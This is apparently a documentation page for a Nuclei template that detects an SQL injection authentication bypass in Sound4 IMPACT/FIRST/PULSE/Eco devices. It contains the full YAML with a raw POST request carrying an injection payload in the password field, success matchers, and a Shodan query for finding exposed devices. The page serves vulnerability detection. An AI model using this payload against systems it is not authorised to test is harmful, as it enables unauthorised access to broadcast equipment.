Sound4 IMPACT/FIRST/PULSE/Eco <=2.x - Authentication Bypass
ID: sound4-password-auth-bypass
Severity: high
Author: r3Y3r53
Tags: sound4,auth-bypass,sqli,misconfig
Description
Section titled “Description”The application suffers from an SQL Injection vulnerability. Input passed through the ‘password’ POST parameter in ‘index.php’ is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication mechanism.
YAML Source
Section titled “YAML Source”id: sound4-password-auth-bypass
info: name: Sound4 IMPACT/FIRST/PULSE/Eco <=2.x - Authentication Bypass author: r3Y3r53 severity: high description: | The application suffers from an SQL Injection vulnerability. Input passed through the 'password' POST parameter in 'index.php' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication mechanism. reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5727.php metadata: verified: true max-request: 1 shodan-query: http.html:"SOUND4" tags: sound4,auth-bypass,sqli,misconfig
http: - raw: - | POST /index.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
username=test&password=%27%2Bjoxy--%2Bz
host-redirects: true max-redirects: 2 matchers: - type: dsl dsl: - 'contains(body, "SOUND4 PULSE", "Network Diagnostic", "Disconnect")' - 'contains(content_type, "text/html")' - 'status_code == 200' condition: and# digest: 490a00463044022029085036ae64064bacab31eb4cf225ade0dbde81a122342c606e75993f26c89e022028407fd6f38b2cded044793d665f57a943f7c636c4527ebcfed002691264170a:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/other/sound4-impact-password-auth-bypass.yaml"